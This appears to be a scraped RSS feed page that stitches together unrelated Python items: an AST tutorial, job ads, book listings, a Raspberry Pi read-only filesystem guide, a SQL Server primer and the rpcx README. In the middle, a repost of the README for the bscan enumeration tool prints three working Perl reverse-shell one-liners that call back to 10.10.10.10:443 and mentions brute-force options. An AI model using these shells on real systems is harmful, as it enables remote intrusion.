        butn.move(70, 70)
        butn.clicked.connect(self.buttonClicked)
        self.setGeometry(300, 300, 160, 110)
        self.setWindowTitle('Arabic Letters')
        self.show()

    def buttonClicked(self):
        i = randint(0, 37)
        self.lbl2.setFont(QFont('FreeSerif', 40))
        self.lbl2.setTextFormat(1)
        self.lbl2.setText(L[i])
        self.lbl2.setAlignment(Qt.AlignVCenter)
        self.lbl2.setAlignment(Qt.AlignHCenter)
        self.lbl2.setToolTip(lname[i] + '\n')

if __name__ == '__main__':
    lname = ['alif', 'beh', 'teh', 'theh', 'jim', 'ha', 'kha', 'dal', 'dhal', 'ra', 'zin', 'sin', 'shin', 'Sad', 'Dad', 'Ta', 'DHa', 'ain', 'ghain', 'feh', 'qaf', 'kaf', 'lam', 'mim', 'nün', 'heh', 'waw', 'yeh', 'Sifr', 'wáaHid', 'ithnáyn', 'thaláatha', 'árba:ah', 'khámsah', 'sittah', 'sáb:ah', 'thamáanyah',
          Exploring the Abstract Syntax Tree      Cache   Translate Page      
Exploring the Abstract Syntax Tree

Hacktoberfest had me get out of my comfort zone and contribute to different codebases. One of them, a Python linter, gave me exposure to the Python Abstract Syntax Tree.

What is an Abstract Syntax Tree? An abstract syntax tree (AST) is a way of representing the syntax of a programming language as a hierarchical tree-like structure.

In essence we can take a line of code such as this:

pressure = 30

and convert it into a tree structure:



Wikipedia has a slightly different definition:

An AST is usually the result of the syntax analysis phase of a compiler. It often serves as an intermediate representation of the program through several stages that the compiler requires, and has a strong impact on the final output of the compiler.

So the AST is one of the stages towards creating compiled code. Definitely feels like we are getting closer to what the machine understands!



What this enables us to do is to step through the structure of a program and report any issues back (similar to intellisense/linters) or even change the code that is written.

Python provides a library for parsing and navigating an Abstract Syntax Tree and is aptly called ast.

Using the previous example we can create an ast by using the following command:

import ast

code = 'pressure = 3'
tree = ast.parse(code)

Simply printing the tree won’t display the structure and nodes that we want. Instead we can create a node visitor that will traverse the tree and give us details on each of the nodes:

class Visitor(ast.NodeVisitor):
    def generic_visit(self, node):
        print(type(node).__name__)
        ast.NodeVisitor.generic_visit(self, node)

Now if we create an instance of this visitor class and call visitor.visit(tree), we will get the following output:

Module

Assign

Name

Store

Num

For a linter this is quite useful for checking whether any of these node orderings are invalid. A good example of this is when you have if True:… a redundant if statement, since its test always evaluates to the same result.

When we run visit on an if True:… we get the following:

Module

If

NameConstant

Expr

Ellipsis

In this case the True value is the NameConstant . The ast visitor allows us to create specific methods that get invoked when a particular ClassName is visited. This is achieved using the following syntax:

def visit_{className}(self, node):

In this case we are wanting to visit any If node and check it’s test condition to ensure that it isn’t just a NameConstant (True, False or None). This is where the ast documentation is quite useful as you can see what properties are available for each node type. We can access the node.test condition like so:

statement = "If statement always evaluates to {} on line {}"

def visit_If(self, node):
    condition = node.test
    if isinstance(condition, ast.NameConstant):
        print(statement.format(condition.value, node.lineno))
    ast.NodeVisitor.generic_visit(self, node)

Running this on our previous example gives us a nice detailed message:

If statement always evaluates to True on line 1

You are not limited to only ‘visiting’ a node in the AST. Using another one of Python’s classes, ast.NodeTransformer, you can modify nodes too! This leads to really cool possibilities, like inserting temporary lines of code to test the code coverage of your program, or even transpiling to other languages.
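As a small sketch of that idea, here is a NodeTransformer that folds the name pressure into the literal 30 before the code runs. Note that on Python 3.8+ literals show up as ast.Constant rather than the older Num/NameConstant nodes discussed above:

```python
import ast

class FoldPressure(ast.NodeTransformer):
    """Replace every read of the name `pressure` with the literal 30."""
    def visit_Name(self, node):
        if node.id == "pressure" and isinstance(node.ctx, ast.Load):
            return ast.copy_location(ast.Constant(value=30), node)
        return node

tree = ast.parse("result = pressure * 2")
tree = ast.fix_missing_locations(FoldPressure().visit(tree))

namespace = {}
exec(compile(tree, "<ast>", "exec"), namespace)
print(namespace["result"])  # 30 * 2 = 60
```

Only Load contexts are rewritten, so assignments to pressure would be left alone.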

I recommend checking out the following resources if you are looking to make use of ast in python:

Green Tree Snakes - the missing Python AST docs

^ This one even includes a live web AST visualizer which can help see the code structure quickly!

Official AST Documentation

A copy of the code in this post can be found here

The next thing I would like to investigate is using the NodeTransformer to potentially transpile from Python over to another language like JavaScript.

Thanks for reading!

Share your experience/use cases for AST in the comments below!


          bscan: An Information Gathering and Service Enumeration Tool      Cache   Translate Page      
Introduction

bscan is an active information gathering and service enumeration tool. At its core, it asynchronously spawns processes of well-known scanning utilities, repurposing their results into highlighted console output and a well-defined directory structure.

Installation

Although bscan was developed to run on Kali Linux, it is not limited to Kali. It will run normally on any system with the necessary runtime environment installed.

Download the latest packaged release from PyPI:

pip install bscan

Or grab the latest version from version control:

pip install https://github.com/welchbj/bscan/archive/master.tar.gz

Basic Usage

bscan provides a variety of configuration options that you can adjust as needed. Here is a simple example:

$ bscan \
> --max-concurrency 3 \
> --patterns [Mm]icrosoft \
> --status-interval 10 \
> --verbose-status \
> scanme.nmap.org

max-concurrency 3: run no more than 3 concurrent scan subprocesses at a time

patterns [Mm]icrosoft: defines a custom regex pattern whose matches are highlighted in the generated scan output

status-interval 10: tells bscan to print a runtime status update every 10 seconds

verbose-status: means each status update prints details of all currently running scan subprocesses

scanme.nmap.org: the host we want to enumerate

bscan also relies on some additional configuration files. The default files can be found in the bscan/configuration directory; their main purposes are as follows:

patterns.txt: specifies regex patterns that, when matched against scan output, are highlighted in the console output

required-programs.txt: specifies the installed programs that bscan plans to use

port-scans.toml: defines the port-discovery scans to run on targets, as well as the regexes used to parse port numbers and service names from their output

service-scans.toml: defines the scans to run on targets on a per-service basis

All of bscan's available options:

usage: bscan [OPTIONS] targets
_
| |__ ___ ___ __ _ _ __
| '_ \/ __|/ __/ _` | '_ \
| |_) \__ \ (__ (_| | | | |
|_.__/|___/\___\__,_|_| |_|
an asynchronous service enumeration tool
positional arguments:
targets               the targets and/or networks on which to perform enumeration
optional arguments:
-h, --help            show this help message and exit
--brute-pass-list F   filename of password list to use for brute-forcing
--brute-user-list F   filename of user list to use for brute-forcing
--cmd-print-width I   maximum integer number of characters allowed when printing the command used to spawn a running subprocess (defaults to 80)
--config-dir D        base directory from which to load configuration files; required configuration files missing from this directory will instead be loaded from the default files shipped with this program
--hard                force overwrite of existing directories
--max-concurrency I   maximum integer number of subprocesses permitted to run concurrently (defaults to 20)
--no-program-check    disable checking for the presence of required system programs
--no-file-check       disable checking for the presence of files such as configured wordlists
--no-service-scans    disable running scans on discovered services
--output-dir D        base directory in which to write output files
--patterns [ [ ...]]  regex patterns to highlight in output text
--ping-sweep          enable ping-sweep filtering of hosts from a network range before more intensive scans are run
--quick-only          whether to only run the quick scan (and not include a thorough scan over all ports)
--qs-method S         method for performing the initial TCP port scan; must correspond to a configured port scan
--status-interval I   integer number of seconds to pause between printing status updates; non-positive values disable updates (defaults to 30)
--ts-method S         method for performing the thorough TCP port scan; must correspond to a configured port scan
--udp                 whether to run UDP scans
--udp-method S        method for performing the UDP port scan; must correspond to a configured port scan
--verbose-status      whether to print verbose runtime status updates, at the frequency specified by the --status-interval argument
--version             program version info
--web-word-list F     the wordlist to use for scans

bscan ships with two main utility programs: bscan-wordlists and bscan-shells. bscan-wordlists is a program for finding wordlist files on Kali Linux. It searches a few default directories and allows glob filename matching. Here is a simple usage example:

$ bscan-wordlists --find "*win*"
/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
/usr/share/wordlists/metasploit/sensitive_files_win.txt
/usr/share/seclists/Passwords/common-passwords-win.txt

For more options, see bscan-wordlists --help.

bscan-shells can generate various kinds of reverse shells for a target address and port you provide. Here is a simple example that lists all Perl-based shells, configured to call back to 10.10.10.10 on port 443:

$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl with /bin/sh
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Note: bscan-shells pulls these commands from the reverse-shells.toml configuration file. For more options, see bscan-shells --help.

Demo video: https://asciinema.org/a/207654?autoplay=1&speed=2

Development

First, set up a new development environment and install the dependencies (using virtualenvwrapper / virtualenvwrapper-win):

# setup the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev
# get the deps
pip install -r dev-requirements.txt

Lint and type-check the project (these also run on Travis):

flake8 . && mypy bscan

Package a new release:

# build source and wheel distributions
python setup.py bdist_wheel sdist
# run post-build checks
twine check dist/*
# upload to PyPI
twine upload dist/*

*Source: GitHub; compiled by FreeBuf editor secist. Please credit CodeSec.Net when reposting.


          Do annotation for my dataset      Cache   Translate Page      
I would like to hire a freelancer to annotate my image dataset (fewer than 100 images in total) using VIA 1.0 (Budget: ₹600 - ₹1500 INR, Jobs: Algorithm, Artificial Intelligence, C Programming, Machine Learning, Python)
          Automation Solution Architect - Cognizant - Wisconsin Rapids, WI      Cache   Translate Page      
Experience in VB Script, JavaScript, Python, Perl, Bash or Power shell is helpful. Hands on development experience in any of the programming languages/platforms...
From Cognizant - Fri, 12 Oct 2018 17:17:41 GMT - View all Wisconsin Rapids, WI jobs
          A Practical Implementation of the Faster R-CNN Algorithm for Object Detection (Part 2 – with Python codes)      Cache   Translate Page      
Introduction Which algorithm do you use for object detection tasks? I have tried out quite a few of them in my quest to build ... The post A Practical Implementation of the Faster R-CNN Algorithm...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

          #1: Python Crash Course: A Hands-On, Project-Based Introduction to Programming      Cache   Translate Page      
Python Crash Course
Python Crash Course: A Hands-On, Project-Based Introduction to Programming
Eric Matthes
(25)

Buy new: CDN$ 45.95 CDN$ 45.05
44 used & new from CDN$ 41.87

(Visit the Bestsellers in Programming list for authoritative information on this product's current rank.)
          #4: Learning Python: Powerful Object-Oriented Programming      Cache   Translate Page      
Learning Python
Learning Python: Powerful Object-Oriented Programming
Mark Lutz
(29)

Buy new: CDN$ 84.05 CDN$ 53.44
46 used & new from CDN$ 48.05

(Visit the Bestsellers in Programming list for authoritative information on this product's current rank.)
          #10: Python for Everybody: Exploring Data in Python 3      Cache   Translate Page      
Python for Everybody
Python for Everybody: Exploring Data in Python 3
Charles Severance , Aimee Andrion , Elliott Hauser , Sue Blumenberg
(7)

Buy new: CDN$ 1.29

(Visit the Bestsellers in Programming list for authoritative information on this product's current rank.)
          devel/py-buildbot - 1.5.0      Cache   Translate Page      
devel/py-buildbot{-*}: Update to 1.5.0 All ports (where necessary): - Fix and equalize *_DEPENDS (and specified versions) to setup.py. - Match COMMENT to setup.py:description. - Add commented LICENSE_FILE describing why its not defined. py-buildbot{-worker}: - Enable concurrent (Multiple Python version) installation. - Update test targets to set PYTHONPATH, so that the package in WRKSRC. is tested, not installed packages. py-buildbot: - Remove post-patch target, no longer necessary. - Add test dependency not declared in setup.py:test_requires, that cause tests to fail when not installed, unlike other dependencies that are skipped. - Add an un-referenced compulsory RUN_DEPENDS on pyyaml reported and resolved upstream [1]. py-buildbot-worker: - Update patch-setup.py to actually fix (package/install) the VERSION file, rather than just not installing it. The worker passes this files contents to the master for display in the frontend if it exists, otherwise sending the string 'latest' or the modification datestamp of another file. [1] - Fix startup script to use the filename of itself (the executed script), not a filename that uses the ${name} variable, which doesnt exist as it contains an underscore (not a dash), causing the following error when executed: /usr/local/etc/rc.d/buildbot-worker: /usr/local/etc/rc.d/buildbot_worker: not found Changelog: http://docs.buildbot.net/current/relnotes/index.html#buildbot-1-5-0-2018-10-09 [1] https://github.com/buildbot/buildbot/pull/4394 Requested by: Tao Zhou Reviewed_by: Nathan Owens , 0mp Differential Revision: D17821
          devel/py-buildbot-console-view - 1.5.0      Cache   Translate Page      
          devel/py-buildbot-grid-view - 1.5.0      Cache   Translate Page      
          devel/py-buildbot-pkg - 1.5.0      Cache   Translate Page      
          devel/py-buildbot-waterfall-view - 1.5.0      Cache   Translate Page      
          devel/py-buildbot-worker - 1.5.0      Cache   Translate Page      
          devel/py-buildbot-www - 1.5.0      Cache   Translate Page      
          Coding Instructor - Python STEAM! - The Curiosity Lab - Newmarket, ON      Cache   Translate Page      
Do you enjoy working with kids? Are you familiar with JavaScript and Python? Are you looking to add to your portfolio/teaching experience? Then we are... $18 - $20 an hour
From Indeed - Thu, 20 Sep 2018 12:28:28 GMT - View all Newmarket, ON jobs
          Urgent! Kids Coding Instructor, JavaScript, Python, Robotics Teacher - The Curiosity Lab - Aurora, ON      Cache   Translate Page      
As one of our instructors you will deliver our programs and workshops to kids. Do you enjoy working with kids?... $18 - $20 an hour
From Indeed - Wed, 26 Sep 2018 11:17:50 GMT - View all Aurora, ON jobs
          Business Intelligence Analyst (Business Objects experience is required) - Calance US - Los Angeles, CA      Cache   Translate Page      
Experience with Tableau or other data visualization tools is preferred, along with experience with R, Python, NoSQL technologies such as Hadoop, Cassandra,...
From Calance - Thu, 01 Nov 2018 18:20:38 GMT - View all Los Angeles, CA jobs
          Business Intelligence Analyst - Latham & Watkins LLP - Los Angeles, CA      Cache   Translate Page      
Experience with Tableau or other data visualization tools is preferred, along with experience with R, Python, NoSQL technologies such as Hadoop, Cassandra,...
From Latham & Watkins LLP - Sat, 18 Aug 2018 05:12:35 GMT - View all Los Angeles, CA jobs
          Senior Python Developer / Team Lead - Chisel - Toronto, ON      Cache   Translate Page      
Chisel.ai is a fast-growing, dynamic startup transforming the insurance industry using Artificial Intelligence. Our novel algorithms employ techniques from...
From Chisel - Mon, 22 Oct 2018 13:32:48 GMT - View all Toronto, ON jobs
          Senior Software Engineer - Python - Tucows - Toronto, ON      Cache   Translate Page      
Flask, Tornado, Django. Tucows provides domain names, Internet services such as email hosting and other value-added services to customers around the world....
From Tucows - Sat, 11 Aug 2018 05:36:13 GMT - View all Toronto, ON jobs
          Senior Software Developer - Integrity Resources - Kitchener-Waterloo, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. Our client overview:....
From Indeed - Wed, 10 Oct 2018 18:08:25 GMT - View all Kitchener-Waterloo, ON jobs
          Senior Software Developer - Encircle - Kitchener, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. We’re Encircle, nice to meet you!...
From Encircle - Mon, 15 Oct 2018 16:58:12 GMT - View all Kitchener, ON jobs
          Software Developer - Encircle - Kitchener, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. We’re Encircle, nice to meet you!...
From Encircle - Mon, 15 Oct 2018 16:58:12 GMT - View all Kitchener, ON jobs
          Senior Software Developer - Integrity Resources - Kitchener, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. Our client Overview:....
From Integrity Resources - Wed, 10 Oct 2018 23:19:39 GMT - View all Kitchener, ON jobs
          Python Software Engineer - PageFreezer - British Columbia      Cache   Translate Page      
Experience using web framework such as Tornado with Python. Python Software Engineer....
From PageFreezer - Mon, 05 Nov 2018 06:09:49 GMT - View all British Columbia jobs
          Python Developer      Cache   Translate Page      
TX-Austin, Our well established client is seeking an ambitious and experienced Python Developer to join their dedicated team in Austin. This position has a great benefit package that includes Medical, Dental and Vision benefits, 401k with company matching, and life insurance for those who qualify. Responsibilities of the Python Developer: Review SOW use cases, specifications, and requirements to develop a cl
          Software Development Engineer, Big Data - Zillow Group - Seattle, WA      Cache   Translate Page      
Experience with Hive, Spark, Presto, Airflow and or Python a plus. About the team....
From Zillow Group - Thu, 01 Nov 2018 11:21:23 GMT - View all Seattle, WA jobs
          Data Scientist - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third party data (think Hive, Presto, SQL Server, Redshift, Python, Mode Analytics, Tableau, R) to uncover real estate trends...
From Zillow Group - Thu, 01 Nov 2018 11:21:23 GMT - View all Seattle, WA jobs
          Data Scientist (Agent Pricing) - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third-party data (think Hive, Presto, SQL Server, Python, Mode Analytics, Tableau, R) to make strategic recommendations....
From Zillow Group - Thu, 01 Nov 2018 11:21:14 GMT - View all Seattle, WA jobs
          Data Visualization Engineer (Zillow Offers) - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third party data (think Hive, Presto, SQL Server, Python, R, Tableau) to develop solutions that will help move the business...
From Zillow Group - Thu, 01 Nov 2018 11:21:14 GMT - View all Seattle, WA jobs
          Data Scientist - Vertical Living - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third party data (think Hive, Presto, SQL Server, Redshift, Python, Mode Analytics, Tableau, R) to make strategic...
From Zillow Group - Thu, 01 Nov 2018 11:21:13 GMT - View all Seattle, WA jobs
          PYTHON APPLICATIONS DEVELOPER - Givex - Toronto, ON      Cache   Translate Page      
We are seeking technically oriented application developers who are passionate about coding and relentless in the pursuit of excellence. Daily responsibilities...
From Givex - Fri, 03 Aug 2018 07:39:22 GMT - View all Toronto, ON jobs
          Headless RPi - prevent SD corruption      Cache   Translate Page      

Raspberry Pis are perfect for interactive art projects (e.g. 20 printers printing ML-generated tweets), and often it's nice to leave the Pi headless, i.e. without keyboard or monitor. It's convenient to just power up the device to start it and pull the power when it's time to shut it down. However, there are two minor issues: how do you get your code to start without a login, and how do you prevent filesystem corruption? Thankfully there are solutions for both.

Startup: Starting your code on startup.

There are many solutions for this, but personally I like to run my code as a service. To do so, add a file like the one below to /etc/init.d/ and make it executable. This assumes your startup script lives in /home/you/mycode/run.sh and expects to be run from that directory.

#! /bin/sh

### BEGIN INIT INFO
# Provides:             tweet_printer
# Required-Start:       $remote_fs $syslog
# Required-Stop:        $remote_fs $syslog
# Default-Start:        2 3 4 5
# Default-Stop:         0 1 6
# Short-Description:    Tweet stream deamon
### END INIT INFO

. /lib/lsb/init-functions

start() {
  log_action_begin_msg "Starting tweet printer daemon"
	cd /home/you/mycode/
	sh run.sh # OR python3 run.py OR ./myexe
  log_action_end_msg
}

stop() {
  log_action_begin_msg "Stopping tweet printer daemon"
  # <Insert command to kill your process here>
  #
  log_action_end_msg
}

case "$1" in
    start)
      start
  ;;
    stop)
      stop
  ;;
    restart)
      stop
      start
  ;;
    *)
      echo "Usage: <MYSERVICENAME> {start|stop|restart}"
      exit 1
  ;;
esac
exit 0

Note that your code will run as root. This could also invoke a Python program directly, but I prefer the shell script to keep things more separated.
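To have the init system actually pick the script up at boot, register it with update-rc.d (standard on Raspbian/Debian). This is a sketch that assumes the init script above was saved as /etc/init.d/tweet_printer:

```shell
# Make the script executable and register it for the default runlevels.
# Assumes the init script above was saved as /etc/init.d/tweet_printer.
sudo chmod +x /etc/init.d/tweet_printer
sudo update-rc.d tweet_printer defaults

# Start it immediately without rebooting:
sudo service tweet_printer start
```

The service name passed to update-rc.d must match the filename in /etc/init.d/, not the Provides: line.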

Shutdown: Preventing SD corruption

Linux systems do not like to be powered off suddenly, and this can lead to corruption of the filesystem on the SD card. Last time we faced this issue we researched a bunch of UPS-like solutions that would detect power failure and provide both bridge-over power and a signal to the Pi to cleanly shut down, using extra electronics and supercaps or batteries. However, there's a much simpler solution: just mount the filesystem read-only. This is not 100% straightforward and has some drawbacks, but for what we were doing it was perfect. It makes the entire system completely stateless and thus unable to corrupt itself. The drawback is that you cannot persist any state from one boot to the next, but there are also workarounds, which we'll discuss at the end. I'm basically following the instructions from http://ideaheap.com/2013/07/stopping-sd-card-corruption-on-a-raspberry-pi/ here, except that I go one step further and mount the system fully read-only. The lock/unlock scripts below work around the usability issue.

0) Disable swapping

This will disable swapping:

sudo dphys-swapfile swapoff
sudo dphys-swapfile uninstall
sudo update-rc.d dphys-swapfile remove

Check that free -m shows the swap to be 0

1) Set up /etc/fstab to mount /var/log and /var/tmp using tmpfs. The system needs scratch space to write into, so just mounting the root filesystem read-only doesn't work very well. However, we can set up an in-RAM filesystem for this purpose. Add these two lines to /etc/fstab:

none                  /var/log        tmpfs   size=1M,noatime   0       0
none                  /var/tmp        tmpfs   size=1M,noatime   0       0

Then also add ro to the lines that mount your root and boot filesystems. In the end the file should look something like this:

proc                  /proc           proc    defaults          0       0
PARTUUID=d6a29f93-01  /boot           vfat    ro,noatime        0       2
PARTUUID=d6a29f93-02  /               ext4    ro,noatime        0       1
none                  /var/log        tmpfs   size=1M,noatime   0       0
none                  /var/tmp        tmpfs   size=1M,noatime   0       0

Now the system will be stateless. However, sometimes it's necessary to unlock it to make modifications:

2) Set up two scripts that let us temporarily lock and unlock the filesystem when we need to edit something.

~/lock.sh

#!/bin/sh
mount -o remount,ro $(mount | grep " on / " | awk '{print $1}')

~/unlock.sh

#!/bin/sh
mount -o remount,rw $(mount | grep " on / " | awk '{print $1}')

If you're updating kernels etc. you may also have to remount /boot, but that's not needed as frequently, so I don't set up a script for it.
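For completeness, remounting /boot works the same way as the lock/unlock scripts; this sketch assumes the /boot mount point from the fstab above:

```shell
# Temporarily make /boot writable (e.g. before a kernel update)...
sudo mount -o remount,rw /boot
# ...do the update, then lock it again:
sudo mount -o remount,ro /boot
```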

3) Run sudo reboot and check that your service starts up.

Drawbacks of this method

In my experience this works really well in practice, but there could be drawbacks:

  • You have no persistent system log, which can make debugging hard if something goes wrong.
  • You can't persist state from one boot to the next. One workaround is to have a second filesystem (e.g. an SD card in a USB adapter, or a USB stick) that is mounted only when needed and then unmounted. Or you can briefly remount / read-write, write your state, and then remount read-only again. Not perfect (the power could go off in just that second), but it makes corruption far less likely. Or, if you have a network, you could send the state to a faraway server.
  • If the in-memory tmp directories fill up, you have a problem.
  • Without a swap partition, if you run out of memory, you'll likely crash.
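The remount-briefly workaround from the list above can be wrapped in a small helper. This is just a sketch; the state file paths are assumptions about your setup:

```shell
#!/bin/sh
# save_state.sh -- persist a small state file while normally running read-only.
# Assumes / is mounted read-only as described above.
set -e
STATE_SRC=/var/tmp/state.json       # lives in tmpfs while the system runs
STATE_DST=/home/you/mycode/state.json

sudo mount -o remount,rw /          # briefly unlock the root filesystem
cp "$STATE_SRC" "$STATE_DST"
sync                                # flush to the SD card before locking again
sudo mount -o remount,ro /
```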

          SQL Server Database Fundamentals      Cache   Translate Page      
Key points about SQL Server databases

1. Why use a database?

Database technology is one of the core technologies of computer science. A database stores data efficiently and in an organized way, letting people manage data more quickly and conveniently. Databases have the following characteristics:

Large amounts of information can be stored in a structured way, making effective retrieval and access convenient for users

Consistency and integrity of the data can be maintained effectively, reducing data redundancy

Application requirements for sharing and security can be met

2. Basic database concepts

(1) What is data?

Data is the symbolic record describing things; it includes numbers, text, graphics, sound, images, and so on. Data is stored in a database in the form of "records", with data of the same format and type stored together; in a database, each row of data is one "record".

(2) What are databases and database tables?

Different records organized together form a database "table"; that is, tables are what hold the data, and a database is a collection of tables.

(3) What is a database management system?

A database management system (DBMS) is the system software that organizes, manages, and accesses database resources effectively. Running on top of the operating system, it supports the user's operations on the database. A DBMS mainly provides the following functions:

Database creation and maintenance: building the database structure, data entry and conversion, database dump and restore, database reorganization, and performance monitoring

Data definition: defining the global data structure, local logical data structures, storage structures, security schemes, and data formats; it ensures the data stored in the database is correct, valid, and consistent, preventing semantically invalid data from being input or output

Data manipulation: data query/statistics and data update

Database operation management: the core of the DBMS, including concurrency control, access control, and internal database maintenance

Communication: between the DBMS and other software

(4) What is a database system?

A database system is a human-machine system composed of hardware, the operating system, the database, the DBMS, application software, and database users.

(5) The database administrator (DBA)

Generally responsible for database updates and backups, maintenance of the database system, user management, and keeping the database system running normally.

3. How databases evolved

Early stage, first-generation databases: in this period IBM's hierarchical-model database management system, IMS, appeared

Middle stage, the arrival of relational databases: DB2 appeared and the SQL language was born

Advanced stage, advanced databases: all kinds of new database types emerged, such as engineering databases, multimedia databases, graphics databases, and intelligent databases

4. The three database models

Network model: many-to-many and many-to-one data relationships; relatively complex

Hierarchical model: similar to the superior/subordinate relationships in a company

Relational model: entities (things in the real world, such as ××× or bank accounts) and relationships

5. Today's mainstream databases

SQL Server: Microsoft's database product, running on Windows.

Oracle: Oracle's product; the representative large-scale database, supporting Linux and Unix.

DB2: Edgar Codd of IBM proposed the relational model theory, and 13 years later IBM's DB2 appeared

MySQL: now acquired by Oracle. It runs on Linux; with Apache or Nginx as the web server, MySQL as the backend database, and PHP/Perl/Python as the script interpreter, it forms the "LAMP" stack

6. Relational databases

(1) Basic structure

The storage structure a relational database uses is a set of two-dimensional tables; that is, the data describing things and their relationships is presented in flat table form. In each two-dimensional table, every row is called a record and describes the information of one object; every column is called a field and describes one attribute of the object. Tables are associated with one another within the database, and these associations are used to query related data. A relational database is made up of the associations between its tables. Specifically:

A data table is usually a two-dimensional table of rows and columns; each table describes the objects, and their attributes, of one particular aspect or part of the database

A row in a table is usually called a record or tuple; it represents one of many objects sharing the same attributes

A column in a table is usually called a field or attribute; it represents an attribute shared by the stored objects

(2) Primary keys and foreign keys

Primary key: uniquely identifies a row in the table; one primary key value corresponds to one row of data. A primary key can consist of one or more fields; its values must be unique and must not be null, and each table allows only one primary key.

Foreign key: one or more columns used to establish and enforce a link between the data of two tables. A relational database usually contains multiple tables, and foreign keys tie these tables together.

(3) Data integrity rules

Entity integrity rule: tuples in a relation must not have null in the primary key attributes

Domain integrity rule: specifies whether a data set is valid for a given column and whether null is allowed

Referential integrity rule: if two tables are linked, referential integrity forbids referencing tuples that do not exist

User-defined integrity rules

7. SQL Server system databases

master database: records system-level information, including all user information, system configuration, the locations of database files, and information about the other databases. If this database is damaged, the whole server is paralyzed and unusable.

model database: the template for new databases

msdb database: used by SQL Server Agent for scheduling alerts and jobs

tempdb database: where temporary files are kept

SQL Server database file types

On disk, a database is stored as files, consisting of data files and transaction log files; a database must contain at least one data file and one transaction log file.

A database is created on one or more files on an NTFS or FAT partition of physical media (such as a hard disk), pre-allocating the physical storage space to be used by the data and the transaction log. The files storing data are called data files; they contain data and objects such as tables and indexes. The files storing the transaction log are called transaction log files (log files for short). Creating a new database creates only an "empty shell"; you must create objects (such as tables) in that shell before the database can be used.

A SQL Server 2008 database has the following four file types:

Primary data file: contains the database's startup information and points to the other files in the database. Every database has one primary data file, with the file extension .mdf.

Secondary (auxiliary) data files: all data files other than the primary data file. Some databases have none, while others have several; the file extension is .ndf.

Transaction log files: contain all the transaction log information needed to recover the database. Every database must have at least one transaction log file, and may have more; the recommended file extension is .ldf.

Filestream: lets SQL Server-based applications store unstructured data, such as documents, pictures, and audio, in the file system. Filestream integrates the SQL Server database engine with the NTFS file system and stores data mainly as the varbinary(max) data type.

Linux公社 RSS feed: https://www.linuxidc.com/rssFeed.aspx

Permanent link to this article: https://www.linuxidc.com/Linux/2018-11/155182.htm


          Senior Python Developer – 1 Opening – Rio de Janeiro – RJ      Cache   Translate Page      
Openings: 1 opening – Rio de Janeiro – RJ (1) To see the job details and apply, click here. If you cannot access it, copy and paste this URL into your browser: https://emprego.net/jobs/5bcf27ba7fa8cd3be411cfc5 emprego.net – where candidates and Read more...
          Junior Python Developer – 1 Opening – Rio de Janeiro – RJ      Cache   Translate Page      
Openings: 1 opening – Rio de Janeiro – RJ (1) To see the job details and apply, click here. If you cannot access it, copy and paste this URL into your browser: https://emprego.net/jobs/5bcf24b80a4181469d2a287e emprego.net – where candidates and Read more...
          Senior Python Developer – 1 Opening – Rio de Janeiro – RJ      Cache   Translate Page      
Openings: 1 opening – Rio de Janeiro – RJ (1) To see the job details and apply, click here. If you cannot access it, copy and paste this URL into your browser: https://emprego.net/jobs/5bcf11bc7fa8cd3be411ca85 emprego.net – where candidates and Read more...
          rpcx      Cache   Translate Page      
A fast multi-language bidirectional RPC framework in Go, like Alibaba Dubbo and Weibo Motan in Java, but with more features; scales easily. 


Cross-Languages

You can use programming languages other than Go to access rpcx services.
  • rpcx-gateway: you can write clients in any programming language to call rpcx services via rpcx-gateway
  • http invoke: you can use plain http requests to access the rpcx gateway
  • Java Client: you can use rpcx-java to access rpcx services via the raw protocol.
If you can write Go methods, you can also write rpc services. It is that easy to write rpc applications with rpcx.

Installation

install the basic features:
go get -u -v github.com/smallnest/rpcx/...
If you want to use the reuseport, quic, kcp, zookeeper, etcd, or consul features, pass those tags to go get, go build, or go run. For example, if you want to use all features, you can:
go get -u -v -tags "reuseport quic kcp zookeeper etcd consul ping rudp utp" github.com/smallnest/rpcx/...
tags:
  • quic: support quic transport
  • kcp: support kcp transport
  • zookeeper: support zookeeper register
  • etcd: support etcd register
  • consul: support consul register
  • ping: support network quality load balancing
  • reuseport: support reuseport

Features

rpcx is an RPC framework like Alibaba Dubbo and Weibo Motan.
rpcx 3.0 has been refactored with these goals:
  1. Simple: easy to learn, easy to develop, easy to integrate, and easy to deploy
  2. Performance: high performance (>= grpc-go)
  3. Cross-platform: supports raw byte slices, JSON, Protobuf, and MessagePack. Theoretically it can be used with Java, PHP, Python, C/C++, Node.js, C#, and other platforms
  4. Service discovery and service governance: supports zookeeper, etcd, and consul.
It contains below features
  • Support raw Go functions. There's no need to define proto files.
  • Pluggable. Features can be extended such as service discovery, tracing.
  • Support TCP, HTTP, QUIC and KCP
  • Support multiple codecs such as JSON, Protobuf, MessagePack, and raw bytes.
  • Service discovery. Support peer2peer, configured peers, zookeeper, etcd, consul, and mDNS.
  • Fault tolerance: Failover, Failfast, Failtry.
  • Load balancing: supports Random, RoundRobin, Consistent hashing, Weighted, network quality, and Geography.
  • Support Compression.
  • Support passing metadata.
  • Support Authorization.
  • Support heartbeat and one-way request.
  • Other features: metrics, log, timeout, alias, circuit breaker.
  • Support bidirectional communication.
